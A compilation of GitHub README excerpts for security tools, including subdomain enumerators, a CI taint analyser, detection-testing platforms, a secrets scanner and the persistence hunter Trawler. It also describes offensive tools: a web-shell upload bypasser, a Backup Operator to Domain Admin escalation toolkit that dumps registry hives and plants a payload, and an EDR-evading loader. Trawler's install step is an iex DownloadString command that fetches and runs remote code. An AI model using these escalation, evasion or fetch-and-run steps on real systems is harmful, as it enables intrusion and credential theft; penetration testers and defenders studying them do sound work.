AzSubEnum is a specialized subdomain enumeration tool tailored for Azure services. This tool is designed to meticulously search and identify subdomains associated with various Azure services. Through a combination of techniques and queries, AzSubEnum delves into the Azure domain structure, systematically probing and collecting subdomains related to a diverse range of Azure services.
AzSubEnum operates by leveraging DNS resolution techniques and systematic permutation methods to unveil subdomains associated with Azure services such as Azure App Services, Storage Accounts, Azure Databases (including MSSQL, Cosmos DB, and Redis), Key Vaults, CDN, Email, SharePoint, Azure Container Registry, and more. Its functionality extends to comprehensively scanning different Azure service domains to identify associated subdomains.
With this tool, users can conduct thorough subdomain enumeration within Azure environments, aiding security professionals, researchers, and administrators in gaining insights into the expansive landscape of Azure services and their corresponding subdomains.
During my learning journey on Azure AD exploitation, I discovered that the Azure subdomain tool, Invoke-EnumerateAzureSubDomains from NetSPI, was unable to run on my Debian PowerShell. Consequently, I created a crude implementation of that tool in Python.
β AzSubEnum git:(main) β python3 azsubenum.py --help
usage: azsubenum.py [-h] -b BASE [-v] [-t THREADS] [-p PERMUTATIONS]
Azure Subdomain Enumeration
options:
-h, --help show this help message and exit
-b BASE, --base BASE Base name to use
-v, --verbose Show verbose output
-t THREADS, --threads THREADS
Number of threads for concurrent execution
-p PERMUTATIONS, --permutations PERMUTATIONS
File containing permutations
Basic enumeration:
python3 azsubenum.py -b retailcorp --thread 10
Using permutation wordlists:
python3 azsubenum.py -b retailcorp --thread 10 --permutation permutations.txt
With verbose output:
python3 azsubenum.py -b retailcorp --thread 10 --permutation permutations.txt --verbose
This repo contains the code for our USENIX Security '23 paper "ARGUS: A Framework for Staged Static Taint Analysis of GitHub Workflows and Actions". Argus is a comprehensive security analysis tool specifically designed for GitHub Actions. Built with an aim to enhance the security of CI/CD workflows, Argus utilizes taint-tracking techniques and an impact classifier to detect potential vulnerabilities in GitHub Action workflows.
Visit our website - secureci.org for more information.
Taint-Tracking: Argus uses sophisticated algorithms to track the flow of potentially untrusted data from specific sources to security-critical sinks within GitHub Actions workflows. This enables the identification of vulnerabilities that could lead to code injection attacks.
Impact Classifier: Argus classifies identified vulnerabilities into High, Medium, and Low severity classes, providing a clearer understanding of the potential impact of each identified vulnerability. This is crucial in prioritizing mitigation efforts.
This Python script provides a command line interface for interacting with GitHub repositories and GitHub actions.
python argus.py --mode [mode] --url [url] [--output-folder path_to_output] [--config path_to_config] [--verbose] [--branch branch_name] [--commit commit_hash] [--tag tag_name] [--action-path path_to_action] [--workflow-path path_to_workflow]
--mode
: The mode of operation. Choose either 'repo' or 'action'. This parameter is required.--url
: The GitHub URL. Use USERNAME:TOKEN@URL
for private repos. This parameter is required.--output-folder
: The output folder. The default value is '/tmp'. This parameter is optional.--config
: The config file. This parameter is optional.--verbose
: Verbose mode. If this option is provided, the logging level is set to DEBUG. Otherwise, it is set to INFO. This parameter is optional.--branch
: The branch name. You must provide exactly one of: --branch
, --commit
, --tag
. This parameter is optional.--commit
: The commit hash. You must provide exactly one of: --branch
, --commit
, --tag
. This parameter is optional.--tag
: The tag. You must provide exactly one of: --branch
, --commit
, --tag
. This parameter is optional.--action-path
: The (relative) path to the action. You cannot provide --action-path
in repo mode. This parameter is optional.--workflow-path
: The (relative) path to the workflow. You cannot provide --workflow-path
in action mode. This parameter is optional.To use this script to interact with a GitHub repo, you might run a command like the following:
python argus.py --mode repo --url https://github.com/username/repo.git --branch master
This would run the script in repo mode on the master branch of the specified repository.
Argus can be run inside a docker container. To do so, follow the steps:
results
folderYou can view SARIF results either through an online viewer or with a Visual Studio Code (VSCode) extension.
Online Viewer: The SARIF Web Viewer is an online tool that allows you to visualize SARIF files. You can upload your SARIF file (argus_report.sarif
) directly to the website to view the results.
VSCode Extension: If you prefer to use VSCode, you can install the SARIF Viewer extension. After installing the extension, you can open your SARIF file (argus_report.sarif
) in VSCode. The results will appear in the SARIF Explorer pane, which provides a detailed and navigable view of the results.
Remember to handle the SARIF file with care, especially if it contains sensitive information from your codebase.
If there is an issue with needing the Github authorization for running, you can provide username:TOKEN
in the GITHUB_CREDS
environment variable. This will be used for all the requests made to Github. Note, we do not store this information anywhere, neither create any thing in the Github account - we only use this for cloning the repositories.
Argus is an open-source project, and we welcome contributions from the community. Whether it's reporting a bug, suggesting a feature, or writing code, your contributions are always appreciated!
If you use Argus in your research, please cite our paper:
@inproceedings{muralee2023Argus,
title={ARGUS: A Framework for Staged Static Taint Analysis of GitHub Workflows and Actions},
author={S. Muralee, I. Koishybayev, A. Nahapetyan, G. Tystahl, B. Reaves, A. Bianchi, W. Enck,
A. Kapravelos, A. Machiry},
booktitle={32st USENIX Security Symposium (USENIX Security 23)},
year={2023},
}
With the rapidly increasing variety of attack techniques and a simultaneous rise in the number of detection rules offered by EDRs (Endpoint Detection and Response) and custom-created ones, the need for constant functional testing of detection rules has become evident. However, manually re-running these attacks and cross-referencing them with detection rules is a labor-intensive task which is worth automating.
To address this challenge, I developed "PurpleKeep," an open-source initiative designed to facilitate the automated testing of detection rules. Leveraging the capabilities of the Atomic Red Team project which allows to simulate attacks following MITRE TTPs (Tactics, Techniques, and Procedures). PurpleKeep enhances the simulation of these TTPs to serve as a starting point for the evaluation of the effectiveness of detection rules.
Automating the process of simulating one or multiple TTPs in a test environment comes with certain challenges, one of which is the contamination of the platform after multiple simulations. However, PurpleKeep aims to overcome this hurdle by streamlining the simulation process and facilitating the creation and instrumentation of the targeted platform.
Primarily developed as a proof of concept, PurpleKeep serves as an End-to-End Detection Rule Validation platform tailored for an Azure-based environment. It has been tested in combination with the automatic deployment of Microsoft Defender for Endpoint as the preferred EDR solution. PurpleKeep also provides support for security and audit policy configurations, allowing users to mimic the desired endpoint environment.
To facilitate analysis and monitoring, PurpleKeep integrates with Azure Monitor and Log Analytics services to store the simulation logs and allow further correlation with any events and/or alerts stored in the same platform.
TLDR: PurpleKeep provides an Attack Simulation platform to serve as a starting point for your End-to-End Detection Rule Validation in an Azure-based environment.
The project is based on Azure Pipelines and requires the following to be able to run:
You can provide a security and/or audit policy file that will be loaded to mimic your Group Policy configurations. Use the Secure File option of the Library in Azure DevOps to make it accessible to your pipelines.
Refer to the variables file for your configurable items.
Deploying the infrastructure uses the Azure Pipeline to perform the following steps:
Currently only the Atomics from the public repository are supported. The pipelines takes a Technique ID as input or a comma seperate list of techniques, for example:
The logs of the simulation are ingested into the AtomicLogs_CL table of the Log Analytics Workspace.
There are currently two ways to run the simulation:
This pipeline will deploy a fresh platform after the simulation of each TTP. The Log Analytic workspace will maintain the logs of each run.
Warning: this will onboard a large number of hosts into your EDR
A fresh infrastructure will be deployed only at the beginning of the pipeline. All TTP's will be simulated on this instance. This is the fastests way to simulate and prevents onboarding a large number of devices, however running a lot of simulations in a same environment has the risk of contaminating the environment and making the simulations less stable and predictable.
AntiSquat leverages AI techniques such as natural language processing (NLP), large language models (ChatGPT) and more to empower detection of typosquatting and phishing domains.
git clone https://github.com/redhuntlabs/antisquat
.pip install -r requirements.txt
..openai-key
and paste your chatgpt api key in there..godaddy-key
and paste your godaddy api key in there.blacklist.txt
. Type in a line-separated list of domains youβd like to ignore. Regular expressions are supported.python3.8 antisquat.py domains.txt
Letβs say youβd like to run antisquat on "flipkart.com".
Create a file named "domains.txt", then type in flipkart.com
. Then run python3.8 antisquat.py domains.txt
.
AntiSquat generates several permutations of the domain, iterates through them one-by-one and tries extracting all contact information from the page.
A test case for amazon.com is attached. To run it without any api keys, simply run python3.8 test.py
Here, the tool appears to have captured a test phishing site for amazon.com. Similar domains that may be available for sale can be captured in this way and any contact information from the site may be extracted.
If you'd like to know more about the tool, make sure to check out our blog.
To know more about our Attack Surface
Management platform, check out NVADR.
Little AV/EDR Evasion Lab for training & learning purposes. (οοΈ under construction..)β
____ _ _____ ____ ____ ___ __ _____ _
| __ ) ___ ___| |_ | ____| _ \| _ \ / _ \ / _| |_ _| |__ ___
| _ \ / _ \/ __| __| | _| | | | | |_) | | | | | |_ | | | '_ \ / _ \
| |_) | __/\__ \ |_ | |___| |_| | _ < | |_| | _| | | | | | | __/
|____/_\___||___/\__| |_____|____/|_| \_\ \___/|_| |_| |_| |_|\___|
| \/ | __ _ _ __| | _____| |_
| |\/| |/ _` | '__| |/ / _ \ __|
| | | | (_| | | | < __/ |_ Yazidou - github.com/Xacone
|_| |_|\__,_|_| |_|\_\___|\__|
BestEDROfTheMarket is a naive user-mode EDR (Endpoint Detection and Response) project, designed to serve as a testing ground for understanding and bypassing EDR's user-mode detection methods that are frequently used by these security solutions.
These techniques are mainly based on a dynamic analysis of the target process state (memory, API calls, etc.),
Feel free to check this short article I wrote that describe the interception and analysis methods implemented by the EDR.
In progress:
Usage: BestEdrOfTheMarket.exe [args]
/help Shows this help message and quit
/v Verbosity
/iat IAT hooking
/stack Threads call stack monitoring
/nt Inline Nt-level hooking
/k32 Inline Kernel32/Kernelbase hooking
/ssn SSN crushing
BestEdrOfTheMarket.exe /stack /v /k32
BestEdrOfTheMarket.exe /stack /nt
BestEdrOfTheMarket.exe /iat
Existing tools don't really "understand" code. Instead, they mostly parse texts.
DeepSecrets expands classic regex-search approaches with semantic analysis, dangerous variable detection, and more efficient usage of entropy analysis. Code understanding supports 500+ languages and formats and is achieved by lexing and parsing - techniques commonly used in SAST tools.
DeepSecrets also introduces a new way to find secrets: just use hashed values of your known secrets and get them found plain in your code.
Under the hood story is in articles here: https://hackernoon.com/modernizing-secrets-scanning-part-1-the-problem
Pff, is it still regex-based?
Yes and no. Of course, it uses regexes and finds typed secrets like any other tool. But language understanding (the lexing stage) and variable detection also use regexes under the hood. So regexes is an instrument, not a problem.
Why don't you build true abstract syntax trees? It's academically more correct!
DeepSecrets tries to keep a balance between complexity and effectiveness. Building a true AST is a pretty complex thing and simply an overkill for our specific task. So the tool still follows the generic SAST-way of code analysis but optimizes the AST part using a different approach.
I'd like to build my own semantic rules. How do I do that?
Only through the code by the moment. Formalizing the rules and moving them into a flexible and user-controlled ruleset is in the plans.
I still have a question
Feel free to communicate with the maintainer
From Github via pip
$ pip install git+https://github.com/avito-tech/deepsecrets.git
From PyPi
$ pip install deepsecrets
The easiest way:
$ deepsecrets --target-dir /path/to/your/code --outfile report.json
This will run a scan against /path/to/your/code
using the default configuration:
Report will be saved to report.json
Run deepsecrets --help
for details.
Basically, you can use your own ruleset by specifying --regex-rules
. Paths to be excluded from scanning can be set via --excluded-paths
.
The built-in ruleset for regex checks is located in /deepsecrets/rules/regexes.json
. You're free to follow the format and create a custom ruleset.
Example ruleset for regex checks is located in /deepsecrets/rules/regexes.json
. You're free to follow the format and create a custom ruleset.
There are several core concepts:
File
Tokenizer
Token
Engine
Finding
ScanMode
Just a pythonic representation of a file with all needed methods for management.
A component able to break the content of a file into pieces - Tokens - by its logic. There are four types of tokenizers available:
FullContentTokenizer
: treats all content as a single token. Useful for regex-based search.PerWordTokenizer
: breaks given content by words and line breaks.LexerTokenizer
: uses language-specific smarts to break code into semantically correct pieces with additional context for each token.A string with additional information about its semantic role, corresponding file, and location inside it.
A component performing secrets search for a single token by its own logic. Returns a set of Findings. There are three engines available:
RegexEngine
: checks tokens' values through a special rulesetSemanticEngine
: checks tokens produced by the LexerTokenizer using additional context - variable names and valuesHashedSecretEngine
: checks tokens' values by hashing them and trying to find coinciding hashes inside a special rulesetThis is a data structure representing a problem detected inside code. Features information about the precise location inside a file and a rule that found it.
This component is responsible for the scan process.
PerFileAnalyzer
- the method called against each file, returning a list of findings. The primary usage is to initialize necessary engines, tokenizers, and rulesets.The current implementation has a CliScanMode
built by the user-provided config through the cli args.
The project is supposed to be developed using VSCode and 'Remote containers' feature.
Steps:
Nodesub is a command-line tool for finding subdomains in bug bounty programs. It supports various subdomain enumeration techniques and provides flexible options for customization.
To install Nodesub, use the following command:
npm install -g nodesub
NOTE:
~/.config/nodesub/config.ini
nodesub -h
This will display help for the tool. Here are all the switches it supports.
Enumerate subdomains for a single domain:
nodesub -u example.com
Enumerate subdomains for a list of domains from a file:
nodesub -l domains.txt
Perform subdomain enumeration using CIDR:
node nodesub.js -c 192.168.0.0/24 -o subdomains.txt
node nodesub.js -c CIDR.txt -o subdomains.txt
Perform subdomain enumeration using ASN:
node nodesub.js -a AS12345 -o subdomains.txt
node nodesub.js -a ASN.txt -o subdomains.txt
Enable recursive subdomain enumeration and output the results to a JSON file:
nodesub -u example.com -r -o output.json -f json
The tool provides various output formats for the results, including:
The output file contains the resolved subdomains, failed resolved subdomains, or all subdomains based on the options chosen.
Trawler is a PowerShell script designed to help Incident Responders discover potential indicators of compromise on Windows hosts, primarily focused on persistence mechanisms including Scheduled Tasks, Services, Registry Modifications, Startup Items, Binary Modifications and more.
Currently, trawler can detect most of the persistence techniques specifically called out by MITRE and Atomic Red Team with more detections being added on a regular basis.
Just download and run trawler.ps1 from an Administrative PowerShell/cmd prompt - any detections will be displayed in the console as well as written to a CSV ('detections.csv') in the current working directory. The generated CSV will contain Detection Name, Source, Risk, Metadata and the relevant MITRE Technique.
Or use this one-liner from an Administrative PowerShell terminal:
iex ((New-Object System.Net.WebClient).DownloadString('https://raw.githubusercontent.com/joeavanzato/Trawler/main/trawler.ps1'))
Certain detections have allow-lists built-in to help remove noise from default Windows configurations (10/2016/2019/2022) - expected Scheduled Tasks, Services, etc. Of course, it is always possible for attackers to hijack these directly and masquerade with great detail as a default OS process - take care to use multiple forms of analysis and detection when dealing with skillful adversaries.
If you have examples or ideas for additional detections, please feel free to submit an Issue or PR with relevant technical details/references - the code-base is a little messy right now and will be cleaned up over time.
Additionally, if you identify obvious false positives, please let me know by opening an issue or PR on GitHub! The obvious culprits for this will be non-standard COMs, Services or Tasks.
-scanoptions : Tab-through possible detections and select a sub-set using comma-delimited terms (eg. .\trawler.ps1 -scanoptions Services,Processes)
-hide : Suppress Detection output to console
-snapshot : Capture a "persistence snapshot" of the current system, defaulting to "$PSScriptRoot\snapshot.csv"
-snapshotpath : Define a custom file-path for saving snapshot output to.
-outpath : Define a custom file-path for saving detection output to (defaults to "$PSScriptRoot\detections.csv")
-loadsnapshot : Define the path for an existing snapshot file to load as an allow-list reference
-drivetarget : Define the variable for a mounted target drive (eg. .\trawler.ps1 -targetdrive "D:") - using this alone leads to an 'assumed homedrive' variable of C: for analysis purposes
PersistenceSniper is an awesome tool - I've used it heavily in the past - but there are a few key points that differentiate these utilities
Overall, these tools are extremely similar but approach the problem from slightly different angles - PersistenceSniper provides all information back to the analyst for review while Trawler tries to limit what is returned to only results that are likely to be potential adversary persistence mechanisms. As such, there is a possibility for false-negatives with trawler if an adversary completely mimics an allow-listed item.
Trawler supports loading an allow-list from a 'snapshot' - to do this requires two steps.
That's it - all relevant detections will then draw from the snapshot file as an allow-list to reduce noise and identify any potential changes to the base image that may have occurred.
(Allow-listing is implemented for most of the checks but not all - still being actively implemented)
Often during an investigation, analysts may end up mounting a new drive that represents an imaged Windows device - Trawler now partially supports scanning these mounted drives through the use of the '-drivetarget' parameter.
At runtime, Trawler will re-target temporary script-level variables for use in checking file-based artifacts and also will attempt to load relevant Registry Hives (HKLM\SOFTWARE, HKLM\SYSTEM, NTUSER.DATs, USRCLASS.DATs) underneath HKLM/HKU and prefixed by 'ANALYSIS_'. Trawler will also attempt to unload these temporarily loaded hives upon script completion.
As an example, if you have an image mounted at a location such as 'F:\Test' which contains the NTFS file system ('F:\Test\Windows', 'F:\Test\User', etc) then you can invoke trawler like below;
.\trawler.ps1 -drivetarget "F:\Test"
Please note that since trawler attempts to load the registry hive files from the drive in question, mapping a UNC path to a live remote device will NOT work as those files will not be accessible due to system locks. I am working on an approach which will handle live remote devices, stay tuned.
Most other checks will function fine because they are based entirely on reading registry hives or file-based artifacts (or can be converted to do so, such as directly reading Task XML as opposed to using built-in command-lets.)
Any limitations in checks when doing drive-retargeting will be discussed more fully in the GitHub Wiki.
Β
TODO
Please be aware that some of these are (of course) more detected than others - for example, we are not detecting all possible registry modifications but rather inspecting certain keys for obvious changes and using the generic MITRE technique "Modify Registry" where no other technique is applicable. For other items such as COM hijacking, we are inspecting all entries in the relevant registry section, checking against 'known-good' patterns and bubbling up unknown or mismatched values, resulting in a much more complete detection surface for that particular technique.
This tool would not exist without the amazing InfoSec community - the most notable references I used are provided below.
Upload_Bypass is a powerful tool designed to assist Pentesters and Bug Hunters in testing file upload mechanisms. It leverages various bug bounty techniques to simplify the process of identifying and exploiting vulnerabilities, ensuring thorough assessments of web applications.
Please note that the use of Upload_Bypass and any actions taken with it are solely at your own risk. The tool is provided for educational and testing purposes only. The developer of Upload_Bypass is not responsible for any misuse, damage, or illegal activities caused by its usage.
While Upload_Bypass aims to assist Pentesters and Bug Hunters in testing file upload mechanisms, it is essential to obtain proper authorization and adhere to applicable laws and regulations before performing any security assessments. Always ensure that you have the necessary permissions from the relevant stakeholders before conducting any testing activities.
The results and findings obtained from using Upload_Bypass should be communicated responsibly and in accordance with established disclosure processes. It is crucial to respect the privacy and integrity of the tested systems and refrain from causing harm or disruption.
By using Upload_Bypass, you acknowledge that the developer cannot be held liable for any consequences resulting from its use. Use the tool responsibly and ethically to promote the security and integrity of web applications.
Download the latest version from Releases page.
pip install -r requirements.txt
The tool will not function properly if the file upload mechanism includes CAPTCHA implementation.
Perhaps in the future the tool will include an OCR.
The Tool is compatible exclusively with output file requests generated by Burp Suite.
Before saving the Burp file, replace the file content with the string *content* and filename.ext with the string *filename* and Content-Type header with *mimetype*(only if the tool is not able to recognize it automatically).
How a request should look before the changes:
How it should look after the changes:
If the tool fails to recognize the mime type automatically, you can add *mimetype* in the parameter's value of the Content-Type header.
Options: -h, --help
show this help message and exit
-b BURP_FILE, --burp-file BURP_FILE
Required - Read from a Burp Suite file
Usage: -b / --burp-file ~/Desktop/output
-s SUCCESS_MESSAGE, --success SUCCESS_MESSAGE
Required if -f is not set - Provide the success message when a file is uploaded
Usage: -s /--success 'File uploaded successfully.'
-f FAILURE_MESSAGE, --failure FAILURE_MESSAGE
Required if -s is not set - Provide a failure message when a file is uploaded
Usage: -f /--failure 'File is not allowed!'
-e FILE_EXTENSION, --extension FILE_EXTENSION
Required - Provide server backend extension
Usage: -e / --extension php (Supported extensions: php,asp,jsp,perl,coldfusion)
-a ALLOWED_EXTENSIONS, --allowed ALLOWED_EXTENSIONS
Required - Provide allowed extensions to be uploaded
Usage: -a /--allowed jpeg, png, zip, etc'
-l WEBSHELL_LOCATION, --location WEBSHELL_LOCATION
Provide a remote path where the WebShell will be uploaded (won't work if the file will be uploaded with a UUID).
Usage: -l / --location /uploads/
-rl NUMBER, --rate-limit NUMBER
Set rate-limiting with milliseconds between each request.
Usage: -r / --rate-limit 700
-p PROXY_NUM, --proxy PROXY_NUM
Channel the HTTP requests via proxy client (i.e Burp Suite).
Usage: -p / --proxy http://127.0.0.1:8080
-S, --ssl
If set, the tool will not validate TLS/SSL certificate.
Usage: -S / --ssl
-c, --continue
If set, the brute force will continue even if one of the methods gets a hit!
Usage: -C /--continue
-E, --eicar
If set, an Eicar file(Anti Malware Testfile) will be uploaded only. WebShells will not be uploaded (Suitable for real environments).
Usage: -E / --eicar
-v, --verbose
If set, details about the test will be printed on the screen
Usage: -v / --verbose
-r, --response
If set, HTTP response will be printed on the screen
Usage: -r / --response
--version
Print the current version of the tool.
--update
Checks for new updates. If there is a new update, it will be downloaded and updated automatically.
python upload_bypass.py -b ~/Desktop/burp_output -s 'file upload successfully!' -e php -a jpeg --response -v --eicar --continue
python upload_bypass.py -b ~/Desktop/burp_output -s 'file upload successfully!' -e asp -a zip -v
python upload_bypass.py -b ~/Desktop/burp_output -s 'file upload successfully!' -e jsp -a png -v --proxy http://127.0.0.1:8080
The BackupOperatorToolkit (BOT) has 4 different mode that allows you to escalate from Backup Operator to Domain Admin.
Use "runas.exe /netonly /user:domain.dk\backupoperator powershell.exe" before running the tool.
The SERVICE mode creates a service on the remote host that will be executed when the host is rebooted.
The service is created by modyfing the remote registry. This is possible by passing the "REG_OPTION_BACKUP_RESTORE" value to RegOpenKeyExA and RegSetValueExA.
It is not possible to have the service executed immediately as the service control manager database "SERVICES_ACTIVE_DATABASE" is loaded into memory at boot and can only be modified with local administrator privileges, which the Backup Operator does not have.
.\BackupOperatorToolkit.exe SERVICE \\PATH\To\Service.exe \\TARGET.DOMAIN.DK SERVICENAME DISPLAYNAME DESCRIPTION
The DSRM mode will set the DsrmAdminLogonBehavior registry key found in "HKLM\SYSTEM\CURRENTCONTROLSET\CONTROL\LSA" to either 0, 1, or 2.
Setting the value to 0 will only allow the DSRM account to be used when in recovery mode.
Setting the value to 1 will allow the DSRM account to be used when the Directory Services service is stopped and the NTDS is unlocked.
Setting the value to 2 will allow the DSRM account to be used with network authentication such as WinRM.
If the DUMP mode has been used and the DSRM account has been cracked offline, set the value to 2 and log into the Domain Controller with the DSRM account which will be local administrator.
.\BackupOperatorToolkit.exe DSRM \\TARGET.DOMAIN.DK 0||1||2
The DUMP mode will dump the SAM, SYSTEM, and SECURITY hives to a local path on the remote host or upload the files to a network share.
Once the hives have been dumped you could PtH with the Domain Controller hash, crack DSRM and enable network auth, or possibly authenticate with another account found in the dumps. Accounts from other forests may be stored in these files, I'm not sure why but this has been observed on engagements with management forests. This mode is inspired by the BackupOperatorToDA project.
.\BackupOperatorToolkit.exe DUMP \\PATH\To\Dump \\TARGET.DOMAIN.DK
The IFEO (Image File Execution Options) will enable you to run an application when a specifc process is terminated.
This could grant a shell before the SERVICE mode will in case the target host is heavily utilized and rarely rebooted.
The executable will be running as a child to the WerFault.exe process.
.\BackupOperatorToolkit.exe IFEO notepad.exe \\Path\To\pwn.exe \\TARGET.DOMAIN.DK
A DLL Loader With Advanced Evasive Features
"Atom"
function via the command line.CRC32
string hashing algorithm.AtomLdr's unhooking method looks like the following
the program Unhooking from the \KnwonDlls\ directory is not a new method to bypass user-land hooks. However, this loader tries to avoid allocating RWX memory when doing so. This was obligatory to do in KnownDllUnhook for example, where RWX permissions were needed to replace the text section of the hooked modules, and at the same time allow execution of functions within these text sections.
This was changed in this loader, where it suspends the running threads, in an attempt to block any function from being called from within the targetted text sections, thus eliminating the need of having them marked as RWX sections before unhooking, making RW permissions a possible choice.
This approach, however, created another problem; when unhooking, NtProtectVirtualMemory
syscall and others were using the syscall instruction inside of ntdll.dll module, as an indirect-syscall approach. Still, as mentioned above, the unhooked modules will be marked as RW sections, making it impossible to perform indirect syscalls, because the syscall instruction that we were jumping to, can't be executed now, so we had to jump to another executable place, this is where win32u.dll
was used.
win32u.dll
contains some syscalls that are GUI-related functions, making it suitable to jump to instead of ntdll.dll. win32u.dll is loaded (statically), but not included in the unhooking routine, which is done to insure that win32u.dll can still execute the syscall instruction we are jumping to.
The suspended threads after that are resumed.
It is worth mentioning that this approach may not be that efficient, and can be unstable, that is due to the thread suspension trick used. However, it has been tested with multiple processes with positive results, in the meantime, if you encountered any problems, feel free to open an issue.
PayloadConfig.pc
file, that contains the encrypted payload, and its encrypted key and iv.PayloadConfig.pc
file will then replace this in the AtomLdr
project.AtomLdr
project as x64 Release.AtomLdr.dll
using rundll32.exe, running Havoc payload, and capturing a screenshotAtomLdr.dll
's Import Address TablePayloadBuilder.exe
, to encrypt demon[111].bin
- a Havoc payload fileAtomLdr.dll
using rundll32.exe